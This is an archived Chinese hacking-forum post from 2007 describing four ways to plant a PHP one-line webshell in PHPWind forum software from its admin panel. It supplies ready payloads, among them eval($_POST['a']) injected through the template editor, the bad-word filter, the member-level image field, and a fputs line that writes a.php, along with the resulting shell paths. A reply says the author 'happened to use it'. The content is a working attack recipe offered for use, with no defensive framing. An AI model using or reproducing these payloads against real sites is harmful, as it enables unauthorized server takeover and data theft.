岁月联盟 - 技术社区 - BBS.SYUE.COM's Archiver

wyzhack 发表于 2007-4-12 13:02

PHPWIND后台拿SHELL的方法

方式1 模板法

进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
[code]
EOT;
eval($a);
print <<

[/code]
例如,我写完某一行为。
[code]
.headurl { color:#ffffff;}
EOT;
eval($_POST[’a’]);
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
[/code]

而后得到一个shell
http://localhost/bbs/index.php
(由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)
密码是a lanker的一句话后门。

方式2 脏话过滤法

进入安全管理 ◇ 不良词语过滤

新增
[code]
不良词语写 a’]=’aa’;eval($_POST[’a’]);//
[/code]
替换为那里可以随意写

而后得到一个shell地址为
[code]
http://localhost/bbs/data/bbscache/wordsfb.php
[/code]

密码是a lanker的一句话后门。

方式3 用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a’;eval($_POST[’a’]);//
升级点数依然可以随意写。

而后得到一个shell地址为
[code]
http://localhost/bbs/data/bbscache/level.php
[/code]
密码是a lanker的一句话后门。
方式4
1:后台添加个 asa 上传

2:
[code]
<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>
[/code]
然后看图修改包含银行查件文件名

bank.php为上传的phpshell的相对路径,访问
[code]
url://hack.php?H_name=bank
[/code]
,就会在论坛根目录生成一

个a.php的最小马。


3:不用上传就是在词语替换那
[code]
<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>
[/code]
插入,然后

备份wordsfb字段记下相对路径。

xianxian 发表于 2008-7-19 17:25

不错的文章刚好用到呵呵

页: [1]

Powered by Discuz! Archiver 7.0.0  © 2001-2009 Comsenz Inc.